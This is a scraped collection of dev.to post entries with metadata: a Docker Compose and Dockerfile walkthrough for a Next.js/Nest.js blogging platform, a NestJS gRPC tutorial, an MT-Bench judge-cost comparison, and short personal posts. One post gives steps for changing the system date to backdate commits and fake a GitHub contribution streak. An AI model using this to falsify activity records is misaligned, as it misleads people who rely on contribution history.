- https://developer.mozilla.org/en-US/docs/Web/HTML/Element/select
- https://developer.mozilla.org/es/docs/Web/HTML/Element/input/checkbox
- https://developer.mozilla.org/es/docs/Web/HTML/Element/input/button
- https://developer.mozilla.org/es/docs/Web/JavaScript
## Experiencia personal
Personalmente yo tenía 8 años y estaba en segundo básico (Mayo de 1997), no hace mucho había aprendido a leer y escribir. Mi padre trajo a la casa un viejo computador con Windows 3.1 que habían dado de baja en su trabajo y me sirvió para practicar las cosas de la revista, aunque principalmente lo usaba para jugar juegos de DOS
y aprender a escribir con el teclado, con eso también aprendí los comandos básicos de terminal como crear carpetas, copiar y borrar archivos y esas cosas del DOS.
Mi padre era más de Excel y Word, así que tuve que aprender todas esas cosas viendo y experimentando por mi cuenta.
Aunque no tuvimos internet en la casa como hasta el 2004, pude ir a su trabajo y descargar cosas y más tutoriales.
Luego de eso también me trajo un libro fotocopiado de Visual Basic 6, donde también aprendí armar programas de escritorio, aunque super básicos.
Terminaré este pequeño post con las mismas palabras del curso de HTML de la revista Club Nintendo:
> Ojalá que estos 3 cursos de HTML. te sirvan y que despierten tu interés por aprender más. Si es así, existen libros muy buenos de programación de otros lenguajes para usarse en Internet.
| clsource |
1,881,458 | I am honored to be a part of this community | A post by Muniru Jamal Mohammed | 0 | 2024-06-08T17:40:55 | https://dev.to/muniru_jamalmohammed_631/i-am-honored-to-be-a-part-of-this-community-5g7n | muniru_jamalmohammed_631 | ||
1,879,163 | Step-by-Step nextpalestine Setup: Complete Overview | Deep Dive into nextpalestine: setup overview Deep Dive into nextpalestine: A Feature-Rich... | 0 | 2024-06-08T17:35:50 | https://adelpro.hashnode.dev/step-by-step-nextpalestine-setup-complete-overview | nextjs, nestjs, docker, signoz | # Deep Dive into nextpalestine: setup overview
Deep Dive into nextpalestine:
A Feature-Rich Open-Source Blogging Platform Built with Next.js and Nest.js
Want to build a beautiful blogging platform with ease? Check out our open source web application nextpalestine!
Effortless blogging platform with a powerful editor, user management, and more. Open source on GitHub!, This presentation will delve into the capabilities of [nextpalestine](https://github.com/adelpro/nextpalestine).
# The root application folder:
nextpalestine is build on a mono-repo structure:
```
.
├── frontend
│ └── package.json
├── backend
│ └── package.json
└── package.json
```
## The root package.json:
```json
{
"name": "nextpalestine-monorepo",
"version": "0.1.0",
"private": true,
"license": "GPL",
"description": "Blogging platform",
"repository": {
"type": "git",
"url": "<https://github.com/adelpro/nextpalestine.git>"
},
"author": "Adel Benyahia <adelpro@gmail.com>",
"authors": ["Adel Benyahia <adelpro@gmail.com>"],
"engines": {
"node": ">=18"
},
"devDependencies": {
"husky": "^8.0.0",
"npm-run-all": "^4.1.5"
},
"scripts": {
"backend": "npm run start:dev -w backend",
"frontend": "npm run dev -w frontend",
"frontend:prod": "npm run build -w frontend && npm run start:prod -w frontend",
"backend:prod": "npm run build -w backend && npm run start:prod -w backend",
"dev": "npm-run-all --parallel backend frontend",
"start": "npm-run-all --parallel backend:prod frontend:prod",
"docker:build": "docker compose down && docker compose up -d --build",
"prepare": "husky install"
},
"workspaces": ["backend", "frontend"],
"lint-staged": {
"**/*.{js,jsx,ts,tsx}": ["npx prettier --write", "npx eslint --fix"]
}
}
```
We are using
[npm-run-all](https://www.npmjs.com/package/npm-run-all) package to run multiple commands in concurrency, for example the command `start` will start two command in parallel `backend` and `frontend` .
[Husky](https://www.npmjs.com/package/husky) is used to run pre-commit hooks, if we check the .husky folder in the root folder
```json
.
├── .husky
│ └── _
│ └── pre-commit
├── frontend
│ └── package.json
├── backend
│ └── package.json
└── package.json
```
## The ./husky folder:
We are using husky to lint fix our code before committing it, and to make this process faster we are using a second package: [lint-staged](https://www.npmjs.com/package/lint-staged) to only lint the staged code (newly added or modified code)
```json
#!/usr/bin/env sh
. "$(dirname -- "$0")/_/husky.sh"
# Exit immediately if any command exits with a non-zero status.
set -e
echo 'Linting project before committing'
npx lint-staged
```
## The compose.yaml
This file is used to build a self-hosted dockerized application that we can deploy to any system that run docker.
To properly run deploy our application to docker we have to:
1- Clone our repo: `git clone [https://github.com/adelpro/nextpalestine.git](https://github.com/adelpro/nextpalestine.git)`
2- Create an .env.production file in the frontend folder aligned to the .env.example (in the same folder).
3- Create an .env.production file in the backend folder aligned to the .env.example (in the same folder).
4- Run: `docker compose up -d`
We will now explain the compose.yaml file
```yaml
services:
# Fontend: NextJs
frontend:
env_file:
- ./frontend/.env.production
container_name: nextpalestine-frontend
image: nextpalestine-frontend
build:
context: ./frontend
dockerfile: Dockerfile
args:
- DOCKER_BUILDKIT=1
ports:
- 3540:3540
restart: unless-stopped
depends_on:
backend:
condition: service_healthy
volumes:
- /app/node_modules
# For live reload if the source or env changes
- ./frontend/src:/app/src
networks:
- app-network
# Backend: NestJS
backend:
container_name: nextpalestine-backend
image: nextpalestine-backend
env_file:
- ./backend/.env.production
build:
context: ./backend
dockerfile: Dockerfile
args:
- DOCKER_BUILDKIT=1
ports:
- 3500:3500
restart: unless-stopped
depends_on:
mongodb:
condition: service_healthy
volumes:
- backend_v_logs:/app/logs
- backend_v_public:/app/public
- /app/node_modules
# For live reload if the source or env changes
- ./backend/src:/app/src
healthcheck:
test: ["CMD-SHELL", "curl -f http://backend:3500/health || exit 1"]
interval: 5s
timeout: 5s
retries: 5
start_period: 20s
networks:
- app-network
# Database: Mongodb
mongodb:
container_name: mongodb
image: mongo:latest
restart: unless-stopped
ports:
- 27018:27017
env_file:
- ./backend/.env.production
networks:
- app-network
volumes:
- mongodb_data:/data/db
- /etc/timezone:/etc/timezone:ro
#- type: bind
# source: ./mongo-entrypoint
# target: /docker-entrypoint-initdb.d/
healthcheck:
test: ["CMD", "mongosh", "--eval", "db.adminCommand('ping')"]
interval: 5s
timeout: 5s
retries: 5
start_period: 20s
# Database UI: Mongo Express
mongo-express:
image: mongo-express:1.0.2-20-alpine3.19
container_name: mongo-express
restart: always
ports:
- 8081:8081
env_file:
- ./backend/.env.production
depends_on:
- mongodb
networks:
- app-network
volumes:
backend_v_logs:
name: nextpalestine_v_backend_logs
backend_v_public:
name: nextpalestine_v_backend_public
mongodb_data:
name: nextpalestine_v_mongodb_data
driver: local
networks:
app-network:
driver: bridge
```
As you can see, we have forth images
### 1- [mongo-express](https://hub.docker.com/_/mongo-express):
mongo-express is a web-based MongoDB admin interface
### 2- [mongo](https://hub.docker.com/_/mongo):
The official mongo docker image, where we have added a health check, we will need at later in the backend image.
```yaml
healthcheck:
test: ["CMD", "mongosh", "--eval", "db.adminCommand('ping')"]
interval: 5s
timeout: 5s
retries: 5
start_period: 20s
```
We have also loaded the .env file from the backend folder
```yaml
env_file:
- ./backend/.env.production
```
We will need these .env variables:
```yaml
MONGO_INITDB_ROOT_USERNAME=root
MONGO_INITDB_ROOT_PASSWORD=password
MONGO_DATABASE_NAME=database
```
And we are creating a persisted (named) volume to persist data between different builds, the second line is a hack to sync the time zone between the docker image and the host that runs it, it ensures that the timestamps in your database match the host system's timezone.
```yaml
volumes:
- mongodb_data:/data/db
- /etc/timezone:/etc/timezone:ro
```
We have also changed the exposed port to(27018), `27018:27017` this will prevent any conflict with any mongodb database installed in the host system with the default port (27017)
### 3- backend (Nest.js)
```yaml
backend:
container_name: nextpalestine-backend
image: nextpalestine-backend
env_file:
- ./backend/.env.production
build:
context: ./backend
dockerfile: Dockerfile
args:
- DOCKER_BUILDKIT=1
ports:
- 3500:3500
restart: unless-stopped
depends_on:
mongodb:
condition: service_healthy
volumes:
- backend_v_logs:/app/logs
- backend_v_public:/app/public
- /app/node_modules
# For live reload if the source or env changes
- ./backend/src:/app/src
healthcheck:
test: ["CMD-SHELL", "curl -f http://backend:3500/health || exit 1"]
interval: 5s
timeout: 5s
retries: 5
start_period: 20s
networks:
- app-network
```
This image is build on ./backend/Dockerfile using DOCKER_BUILDER=1 argument, this will enhance the build speed and caching.
- Env variable are load from ./backend/.env.production.
- It depends on mongodb image, the backend image will not start until the mongo image is fully started and healthy.
- The backend image has it’s own health check that we will use in the frontend (Next.js) image.
- We are persisting logs and public folders using named volumes.
- This volume: `/app/node_modules` is used to persist node_module.
- This volume: `./backend/src:/app/src` to hot reload the image when ever the code is changed.
- The port `3500:3500` is used for the backend.
We will now explain the Dockerfile of the backend (in the backend folder)
```yaml
ARG NODE=node:21-alpine3.19
# Stage 1: builder
FROM ${NODE} AS builder
# Combine commands to reduce layers
RUN apk add --no-cache libc6-compat \
&& apk add --no-cache curl \
&& addgroup --system --gid 1001 nodejs \
&& adduser --system --uid 1001 nestjs
WORKDIR /app
COPY --chown=nestjs:nodejs package*.json ./
RUN --mount=type=cache,target=/root/.yarn YARN_CACHE_FOLDER=/root/.yarn \
yarn install --frozen-lockfile
COPY --chown=nestjs:nodejs . .
ENV NODE_ENV production
# Generate the production build. The build script runs "nest build" to compile the application.
RUN yarn build
# Install only the production dependencies and clean cache to optimize image size.
RUN --mount=type=cache,target=/root/.yarn YARN_CACHE_FOLDER=/root/.yarn \
yarn install --production --frozen-lockfile && yarn cache clean
USER nestjs
# Stage 2: runner
FROM ${NODE} AS runner
RUN apk add --no-cache libc6-compat \
&& apk add --no-cache curl \
&& addgroup --system --gid 1001 nodejs \
&& adduser --system --uid 1001 nestjs
WORKDIR /app
# Set to production environment
ENV NODE_ENV production
# Copy only the necessary files
COPY --chown=nestjs:nodejs --from=builder /app/dist ./dist
COPY --chown=nestjs:nodejs --from=builder /app/logs ./logs
COPY --chown=nestjs:nodejs --from=builder /app/public ./public
COPY --chown=nestjs:nodejs --from=builder /app/node_modules ./node_modules
COPY --chown=nestjs:nodejs --from=builder /app/package*.json ./
# Set Docker as non-root user
USER nestjs
EXPOSE 3500
ENV HOSTNAME "0.0.0.0"
CMD ["node", "dist/main.js"]
```
This is a multi-stage docker file, build on Linux alpine, we are first installing an extra package `libc6-comat` then creating a separate user for our application for an extra security layer.
We are installing `curl` , we will use it to check if our image is healthy.
Then we copies needed folders with the right permissions
We finally run our application suing `node dist/main.js`
### 3- frontend(Nextt.js)
```yaml
# Args
ARG NODE=node:21-alpine3.19
# Stage 1: builder
FROM ${NODE} AS builder
RUN apk add --no-cache libc6-compat \
&& addgroup --system --gid 1001 nodejs \
&& adduser --system --uid 1001 nextjs
WORKDIR /app
COPY --chown=nextjs:nodejs package*.json ./
RUN --mount=type=cache,target=/root/.yarn YARN_CACHE_FOLDER=/root/.yarn \
yarn install --frozen-lockfile
COPY --chown=nextjs:nodejs . .
# Next.js collects completely anonymous telemetry data about general usage.
# Learn more here: https://nextjs.org/telemetry
# Uncomment the following line in case you want to disable telemetry during the build.
ENV NEXT_TELEMETRY_DISABLED 1
ENV NEXT_PRIVATE_STANDALONE true
ENV NODE_ENV production
# Generate the production build
RUN yarn build
# Install only the production dependencies and clean cache
RUN --mount=type=cache,target=/root/.yarn YARN_CACHE_FOLDER=/root/.yarn \
yarn install --frozen-lockfile --production && yarn cache clean
USER nextjs
# Stage 2: runner
FROM ${NODE} AS runner
RUN apk add --no-cache libc6-compat \
&& addgroup --system --gid 1001 nodejs \
&& adduser --system --uid 1001 nextjs
WORKDIR /app
ENV NODE_ENV production
# Uncomment the following line in case you want to disable telemetry during runtime.
ENV NEXT_TELEMETRY_DISABLED 1
COPY --from=builder /app/public ./public
# Set the correct permission for prerender cache
RUN mkdir .next
RUN chown nextjs:nodejs .next
# Automatically leverage output traces to reduce image size
# https://nextjs.org/docs/advanced-features/output-file-tracing
# Copy next.conf only if it's not the default
COPY --from=builder --chown=nextjs:nodejs /app/next.config.js ./
COPY --from=builder --chown=nextjs:nodejs /app/package*.json ./
COPY --from=builder --chown=nextjs:nodejs /app/.next/standalone ./
COPY --from=builder --chown=nextjs:nodejs /app/.next/static ./.next/static
# Set Docker as non-root user
USER nextjs
EXPOSE 3540
ENV PORT 3540
ENV HOSTNAME "0.0.0.0"
# server.js is created by next build from the standalone output
# https://nextjs.org/docs/pages/api-reference/next-config-js/output
CMD ["node", "server.js"]
```
In this multi-stage Dockerfile:
- we are using a slim Linux image based on alpine
- We are creating a new user as an extra security layer
- We are using a special technique to re-use the yarn cache from preview builds (DOCKER_BUILDKIT must be enabled)
`--mount=type=cache,target=/root/.yarn YARN_CACHE_FOLDER=/root/.yarn \`
- We can (optionnaly) disable Next.js telemetry using this line:
`ENV NEXT_TELEMETRY_DISABLED 1`
- Then we are building our Next.js as a standalone application and coping the necessary folders
- We set a custom port: 3540
`ENV PORT 3540`
- And starting the app using: `node server.js` | adelpro |
1,881,457 | gRPC with NestJS: A Comprehensive Beginner's Guide | The world of software development is changing quickly, and creating scalable and effective... | 0 | 2024-06-08T17:34:50 | https://dev.to/adewalecodes/grpc-with-nestjs-a-comprehensive-beginners-guide-4mi9 | The world of software development is changing quickly, and creating scalable and effective microservices is crucial. It is frequently difficult to communicate across different services, particularly when low latency and great performance are desired. Introducing gRPC, a potent, open-source RPC framework developed by Google. When paired with NestJS, an advanced Node.js framework, gRPC offers a reliable inter-service communication solution. You will learn the basics of gRPC, how to integrate it with NestJS, and develop a basic chat service as an example by following this guide.
## Understanding the Fundamentals
**What is gRPC?**
Google created the open-source gRPC (Google Remote Procedure Call) RPC (Remote Procedure Call) framework. It uses Protocol Buffers (protobuf) for serialization and HTTP/2 for transport to facilitate effective, language-neutral communication between distributed systems.
Key Features of gRPC:
- Language Independence: Supports multiple programming languages.
- HTTP/2 Support: Provides features like multiplexing and header compression.
- Bidirectional Streaming: Supports streaming of data between client and server.
- Automatic Code Generation: Reduces boilerplate code through protobuf definitions.
## What is NestJS?
NestJS is a Node.js framework for creating scalable, dependable, and effective server-side applications. It makes use of both TypeScript and contemporary JavaScript features to offer a powerful development environment.
**Key Features of NestJS:**
- Modular Architecture: Encourages a modular approach to application design.
- Dependency Injection: Simplifies management of dependencies.
- Extensive CLI: Provides tools to generate boilerplate code and manage the project.
- Support for Multiple Transport Layers: Includes HTTP, WebSocket, and gRPC.
## Setting Up the Project
**Step 1: Creating a New NestJS Project**
First, let's use the Nest CLI to establish a new NestJS project:
```
nest new grpc-chat-service
```
Navigate into the project directory:
```
cd grpc-chat-service
```
**Step 2: Installing Necessary Dependencies**
To integrate gRPC with NestJS, install the necessary dependencies:
```
npm install @nestjs/microservices grpc @grpc/proto-loader
```
## Defining the Protocol Buffers File
Protocol Buffers (protobuf) is an extendable, platform- and language-neutral method for serializing structured data. To specify our service contract, create a file called chat.proto in the src directory:
```
syntax = "proto3";
service ChatService {
rpc SendMessage (Message) returns (Empty);
}
message Message {
string content = 1;
}
message Empty {}
```
In this definition:
- Service: ChatService contains an RPC method SendMessage.
- Messages: Defines the structure of Message and Empty.
## Implementing the Server
Let's now put the server-side logic for our chat service into practice.
**Step 1: Create a Controller**
```
Create a new file named chat.controller.ts in the src directory:
import { Controller } from '@nestjs/common';
import { GrpcMethod } from '@nestjs/microservices';
import { Empty, Message } from './chat.grpc.pb';
@Controller()
export class ChatController {
private messages: string[] = [];
@GrpcMethod('ChatService', 'SendMessage')
async sendMessage(data: Message): Promise<Empty> {
console.log('Received message:', data.content);
this.messages.push(data.content);
console.log('Current messages:', this.messages);
return {};
}
}
```
- @GrpcMethod: Decorator to map the gRPC method to the NestJS method.
- sendMessage Method: Logs the received message, stores it in an in-memory array, and prints the current list of messages.
**Step 2: Update the Module**
Update app.module.ts to include the ChatController:
```
import { Module } from '@nestjs/common';
import { ChatController } from './chat.controller';
@Module({
controllers: [ChatController],
})
export class AppModule {}
```
## Implementing the Client
We'll now build a client in order to communicate with our gRPC server.
**Step 1: Create a Client Class**
Create a new file named chat.client.ts in the src directory:
```
import { Injectable } from '@nestjs/common';
import { ClientGrpc, ClientProxyFactory, Transport } from '@nestjs/microservices';
import { Message } from './chat.grpc.pb';
import { join } from 'path';
@Injectable()
export class ChatClient {
private readonly client: ClientGrpc;
constructor() {
this.client = ClientProxyFactory.create({
transport: Transport.GRPC,
options: {
url: 'localhost:5000',
package: 'chat',
protoPath: join(__dirname, 'chat.proto'),
},
});
}
async sendMessage(content: string): Promise<void> {
const message: Message = { content };
await this.client.getService('ChatService').sendMessage(message).toPromise();
}
}
```
In this client:
- ClientProxyFactory.create: Creates a gRPC client.
- sendMessage Method: Sends a message to the server.
**Step 2: Integrate Client in Module**
Update app.module.ts to include the ChatClient:
```
import { Module } from '@nestjs/common';
import { ChatClient } from './chat.client';
import { ChatController } from './chat.controller';
@Module({
controllers: [ChatController],
providers: [ChatClient],
})
export class AppModule {}
```
## Bootstrapping the Application
Bootstrapping is the process of starting the application, initializing necessary services, and getting the server up and running.
Update the main.ts file:
```
import { NestFactory } from '@nestjs/core';
import { AppModule } from './app.module';
import { Transport } from '@nestjs/microservices';
import { join } from 'path';
async function bootstrap() {
const app = await NestFactory.createMicroservice(AppModule, {
transport: Transport.GRPC,
options: {
url: 'localhost:5000',
package: 'chat',
protoPath: join(__dirname, 'chat.proto'),
},
});
await app.listenAsync();
}
bootstrap();
```
In this code:
- NestFactory.createMicroservice: Creates a microservice instance.
- Transport Options: Specifies gRPC as the transport and provides necessary configuration like URL, package, and path to the protobuf file
- app.listenAsync: Starts the microservice and listens for incoming gRPC requests.
## Running and Testing the Application
**Step 1: Start the Server**
Run the server:
```
npm run start:dev
```
**Step 2: Use the Client to Send a Message**
We can now use the ChatClient to send a message to our server. You can create a simple script to test this:
Create test-client.ts:
```
import { NestFactory } from '@nestjs/core';
import { AppModule } from './app.module';
import { ChatClient } from './chat.client';
async function testClient() {
const app = await NestFactory.createApplicationContext(AppModule);
const client = app.get(ChatClient);
await client.sendMessage('Hello, gRPC!');
await app.close();
}
testClient();
```
Run the script:
```
`ts-node src/test-client.ts`
```
You should see the server logging the received message and maintaining a list of messages.
## Conclusion
We have examined how to integrate gRPC with NestJS to create effective microservices in this extensive article. We've gone over the basics of gRPC, used Protocol Buffers to build a service, used an in-memory message storage to provide server-side functionality, built a message-sending client, and bootstrapped our NestJS application. You now have the basis to use gRPC's power in your NestJS apps, allowing for high-performance and scalable inter-service communication. Just follow these instructions. Using gRPC and NestJS together provides a reliable and effective solution whether you're developing microservices, real-time apps, or intricate distributed systems.
| adewalecodes | |
1,881,456 | Maintain Lost GitHub Streak | For Past Dates | GitHub Flaw or Not? | Maintain Lost GitHub Streak | For Past Dates | GitHub Flaw or Not? Hey, Dev Community!... | 0 | 2024-06-08T17:32:18 | https://dev.to/sh20raj/maintain-lost-github-streak-for-past-dates-github-flaw-or-not-2a65 | webdev, javascript, programming, abotwrotethis | # Maintain Lost GitHub Streak | For Past Dates | GitHub Flaw or Not?
Hey, Dev Community! 👋
Have you ever missed a day of committing and watched your precious GitHub streak go down the drain? 😱 Well, I discovered a nifty trick to backdate your commits and keep that streak alive! Let’s dive into it.
## How I Found This Trick
So, there I was, happily maintaining my GitHub streak, when I missed a day. 😓 My streak broke, and I was determined to find a way to fix it. That's when I stumbled upon this trick. You can backdate your commits and even set them to future dates! This got me thinking—is this a serious flaw in the GitHub system? 🤔 Let’s find out together!
## Step-by-Step Guide
### 1. Change Your System Date
First, let's roll back the time on your machine. On a Mac, follow these steps:
1. Open **System Preferences**.
2. Go to **Date & Time**.
3. Unlock the settings if needed by clicking the lock icon and entering your password.
4. Change the date to the day you missed (e.g., June 1).
### 2. Make a Commit
Next, make a commit as if it was that day:
1. Open your terminal.
2. Navigate to the Git repository you want to commit to.
3. Make the necessary changes or create a new file.
4. Stage and commit the changes with a commit message. For example:
```sh
git add .
git commit -m "Backdated commit to maintain streak"
```
### 3. Sync Your Changes
Push the commit to your remote repository:
```sh
git push
```
### 4. Verify on GitHub
Check your GitHub profile to ensure the contribution is recorded for the adjusted date. Your streak should now be intact! 🎉
### 5. Revert System Date
Don't forget to change your system date back to the current date and time:
1. Go back to **System Preferences**.
2. Set the date and time to the current day and time.
3. Lock the settings to prevent further changes.
## Is This a GitHub Flaw? 🤔
This trick works because GitHub tracks contributions based on the commit timestamp. By changing your system's date, you can make GitHub think the commit was made on a different day. But this raises a question—is this a serious flaw in GitHub’s system?
On one hand, it can be handy to maintain your streak. On the other hand, it might be seen as manipulating your contribution history, which some might frown upon. What do you think? Share your thoughts in the comments below! 💬
## Bonus: Future Commits
Oh, and guess what? You can also set your system date to the future and make commits. Check out [this commit history](https://github.com/SH20RAJ/react-hooksh/commits/main/) where I tried it out! 😜
## Conclusion
Maintaining a GitHub streak can be motivating, but don’t stress if you miss a day. Use this trick responsibly, and focus on consistent coding practice over time.
## Before and Afters


---


Before

After
---
## Practical
<img width="1470" alt="Screenshot 2024-06-08 at 11 41 42 PM" src="https://github.com/SH20RAJ/sh20raj/assets/66713844/16c2c286-8a75-4d39-97c6-bb3d44f76c93">
<img width="1470" alt="Screenshot 2024-06-08 at 11 32 39 PM" src="https://github.com/SH20RAJ/sh20raj/assets/66713844/967771ad-d655-4fcc-a7e7-247865925fb4">
<img width="1470" alt="Screenshot 2024-06-08 at 11 38 09 PM" src="https://github.com/SH20RAJ/sh20raj/assets/66713844/adbef026-04f1-4894-bc06-ff34fa70eb78">
<img width="1470" alt="Screenshot 2024-06-08 at 11 40 48 PM" src="https://github.com/SH20RAJ/sh20raj/assets/66713844/f3bab455-af2e-4f5e-8c1c-39b4d05037c0">
<img width="1470" alt="Screenshot 2024-06-08 at 11 41 21 PM" src="https://github.com/SH20RAJ/sh20raj/assets/66713844/4ac8b255-2086-4c31-810e-57f3e73c8962">
<img width="1470" alt="Screenshot 2024-06-08 at 11 41 25 PM" src="https://github.com/SH20RAJ/sh20raj/assets/66713844/567560cc-2bec-45db-8f7a-27d88f3dde22">
Happy coding! 🚀 | sh20raj |
1,866,277 | Start Your Cloud Journey in No Time | Brainboard: The Visual Cloud Solution for Startups Brainboard is a visual cloud solution... | 0 | 2024-06-08T17:32:00 | https://dev.to/brainboard/start-your-cloud-journey-in-no-time-44fa | startup, terraform, cloud, cloudcomputing | ## Brainboard: The Visual Cloud Solution for Startups
Brainboard is a visual cloud solution that empowers startups of any size to create their first architecture with the assistance of experts. Whether you are a new startup, scaling up, or aiming to become a unicorn, Brainboard offers the tools and support needed to accelerate your cloud journey.
## From Startups to Scale-Ups or Unicorns
### **Ship the MVP Fast**

Design your first cloud infrastructure without needing to be a DevOps expert. Brainboard allows you to auto-generate the diagram and the code (MVP) in less than a week, speeding up your time to market.
### **Scale Your Infrastructure Management**

Brainboard helps you scale your infrastructure management and advocate for other cloud architects you bring to your team. Its collaborative features make it easier to manage complex infrastructures as your startup grows.
### **Find Other Verticals**

Adopt strong CI strategies that align with your hiring objectives, helping you expand into new verticals efficiently and effectively.
### **Become a Unicorn, Enterprise-Level**

Become independent faster than ever with Brainboard's all-in-one startup pack. This comprehensive solution includes everything you need to scale your operations and reach enterprise-level success.
### **Make It Public!**
Scale with a long-term strategy and growth in mind. Brainboard supports the creation and management of robust cloud infrastructures, ensuring you can handle increased demand and maintain reliability.
## Why Choose Brainboard?

- **Comprehensive Cloud Management Ecosystem**: Brainboard combines tools like Draw.io, Git, Terraform, and CI/CD into a single platform, simplifying the management of multi-cloud environments.
- **Real-Time Collaboration**: Multiple users can design, edit, and review changes in real-time, enhancing teamwork and reducing delays.
- **Automatic Code Generation**: Brainboard auto-generates low-level Terraform code from your designs, ensuring accuracy and efficiency.
- **Security and Compliance**: With built-in security checks, cost estimation, and robust policy enforcement, Brainboard helps maintain compliance and secure your cloud environments.
## Start Your Cloud Journey

Brainboard solutions accelerate your cloud journey, making it easier to design, deploy, and manage cloud infrastructures. Schedule a demo today to see how Brainboard can transform your startup's cloud operations.
For more information, visit [Brainboard](https://brainboard.co) | miketysonofthecloud |
1,880,558 | MT-Bench: Comparing different LLM Judges | By default, MT-Bench uses OpenAI as a service provider with a gpt-4 model ID, which is a vanilla... | 0 | 2024-06-08T17:27:10 | https://dev.to/maximsaplin/mt-bench-comparing-different-llm-judges-4nah | machinelearning, ai, datascience, chatgpt | By default, MT-Bench uses OpenAI as a service provider with a `gpt-4` model ID, which is a vanilla GPT-4 model with 8k context introduced back in Spring 2023. However, it is possible to override the model ID via the `--judge-model` argument.
As of June 2024, GPT-4 series models have the following [pricing](https://openai.com/api/pricing/) (per million tokens):
| | Prompt | Completion |
| -------------------------- | -------------------- | ------------------ |
| GPT-4o | $ 5,00 | $ 15,00 |
| GPT-4-Turbo (0125-preview) | $ 10,00 | $ 30,00 |
| GPT4 8K (0613) | $ 30,00 | $ 60,00 |
By running the MT-Bench using GPT-4 Turbo or Omni one can potentially save 6 times on API calls for one evaluation. But how will the score change? Let's find out :)
## Costs
I have used [Phi-3 Medium](https://huggingface.co/bartowski/Phi-3-medium-4k-instruct-GGUF) with 8K context and quantized at 8-bits (running inference server via LM Studio). I have executed answer generation 4 times. Then for each of the sets, I have run one judgment generation with the three models.
OpenAI API consumption cost per one eval*:
| | |
| -------------------------- | -------------------- |
| GPT-4o | $ 0,93 |
| GPT-4-Turbo (0125-preview) | $ 1,85 |
| GPT4 8K (0613) | $ 5,10 |
*_I only collected the total tokens consumed by `gpt-4-0613` (621805) during 4 runs. For the calculation, I assumed that each model had similar token consumption with 580k prompt and 60k completion tokens_
## Reviewing the Scores
The below findings can not be generalized as they take a small sample of results for just one target model (Phi-3). Still...
For each of the LLM judges, I have calculated the mean (out of 4 runs) and standard deviation as a percentage of the mean. As you can see:
- Omni tends to inflate the score by a factor of 12%
- All models are quite consistent with just a 1-3% deviation in scores
- The vanilla GPT-4 shows the most consistency across turns
| Mean | 1st Turn | 2nd Turn | Avg |
| -------------------------- | -------- | --------- | ---------- |
| GPT-4o | 9,13125 | 8,2814875 | 8,70720325 |
| GPT-4-Turbo (0125-preview) | 8,290625 | 7,5270175 | 7,90932575 |
| GPT-4 8K (0613) | 8,41875 | 7,04375 | 7,73125 |
| StDev | 1st Turn | 2nd Turn | Avg |
| -------------------------- | ---------- | ---------- | ---------- |
| GPT-4o | 0,00230424 | 0,0262376 | 0,01302793 |
| GPT-4-Turbo (0125-preview) | 0,00620126 | 0,02336659 | 0,01396082 |
| GPT-4 8K (0613) | 0,01178508 | 0,01858418 | 0,01152749 |
GPT-4 Turbo is the closest to the baseline of GPT-4 8K, 2nd turn sees the most deviation:
| | % of GPT4 8K |
| -------------------------- | ------------- |
| | 1st Turn | 2nd Turn | Avg |
| GPT-4o | 108,5% | 117,6% | 112,6% |
| GPT-4-Turbo (0125-preview) | 98,5% | 106,9% | 102,3% |
| GPT-4 8K (0613) | 100,0% | 100,0% | 100,0% |
Both Omni and Turbo see the least drop in 2nd turn scores:
| | 2nd turn drop |
| -------------------------- | ------------- |
| GPT-4o | 9,31% |
| GPT-4-Turbo (0125-preview) | 9,21% |
| GPT-4 8K (0613) | 16,33% |
## Raw Scores
| Model | 1st Turn | 2nd Turn | Avg |
| ----------------------------- | -------- | -------- | -------- |
| GPT-4o #1 | 9,14375 | 8,5625 | 8,853125 |
| GPT-4o #2 | 9,14375 | 8,3375 | 8,740625 |
| GPT-4o #3 | 9,1 | 8,15 | 8,625 |
| GPT-4o #4 | 9,1375 | 8,07595 | 8,610063 |
| GPT-4-Turbo (0125-preview) #1 | 8,35 | 7,7 | 8,025 |
| GPT-4-Turbo (0125-preview) #2 | 8,2875 | 7,64557 | 7,968553 |
| GPT-4-Turbo (0125-preview) #3 | 8,3 | 7,4375 | 7,86875 |
| GPT-4-Turbo (0125-preview) #4 | 8,225 | 7,325 | 7,775 |
| GPT-4 8K (0613) #1 | 8,4875 | 7,2125 | 7,85 |
| GPT-4 8K (0613) #2 | 8,5125 | 6,975 | 7,74375 |
| GPT-4 8K (0613) #3 | 8,3 | 7,075 | 7,6875 |
| GPT-4 8K (0613) #4 | 8,375 | 6,9125 | 7,64375 |
## About
[MT-Bench](https://github.com/lm-sys/FastChat/tree/main/fastchat/llm_judge) is a quick (and dirty?) way to evaluate a chatbot model (fine-tuned instruction following LLM). When a new open-source model is published at Hugging-face it is not uncommon to see the score presented as a testament of quality. It offers ~$5 worth of OpenAI API calls towards getting a good ballpark of how your model does. A good tool to iterate on fine-tuning an assistant model.

MT-Bench is a Python program that asks the target model 80 predefined questions (doing inference via HF Transformers or OpenAI compatible API endpoint). The questions cover Humanities, STEM, Extraction, Roleplay, Writing, Reasoning, and Coding. There are 2 turns - it asks a question and gets the answer (1st turn), then adds a follow-up question and collects the 2nd answer (2nd turn). It then iterates through all questions and asks the GPT-4 model (the legacy 8K model from Spring 2023) to score both answers on a scale from 1 to 10 (hence the lowest a model can get is 1, not 0 :). The results are 3 aggregate scores: 1st turn, 2nd turn, and average score.
```
########## First turn ##########
score
model turn
stablelm-2-brief-1_6b_2 1 3.240506
########## Second turn ##########
score
model turn
stablelm-2-brief-1_6b_3 2 2.443038
########## Average ##########
score
model
stablelm-2-brief-1_6b_3 2.822785
```
As explained in this [paper](https://arxiv.org/abs/2306.05685v4), which introduced the MT-Bench and investigated the utility of LLM as an evaluator, the score shows high agreement with human preferences. I.e. the larger the MT-Bench score the higher the model gets on [LMSYS Chatbot Arena](https://chat.lmsys.org/?leaderboard).
Another popular option for LLM evaluation is [AlpacaEval](https://github.com/tatsu-lab/alpaca_eval). This one uses a newer and cheaper GPT-4 Turbo model as a baseline. The authors of AlpacaEval provided correlation coefficients of different evals with LMSYS Arena showing a strong association between LLM judges' scores and human preferences at the Arena:
 | maximsaplin |
1,881,451 | Collaboration on a Website | I am looking for anyone who would like to collaborate with me on my chess website. Its a free website... | 0 | 2024-06-08T17:16:20 | https://dev.to/mehmet_naamani_a157186a1c/collaboration-on-a-website-1751 | javascript, webdev, programming, html | I am looking for anyone who would like to collaborate with me on my chess website. Its a free website where you can play chess by yourself, analyze your games through LiChess/Chess.com and get free ChessBooks. I am looking for an enthusiatic partner to split the website with anyone interested? | mehmet_naamani_a157186a1c |
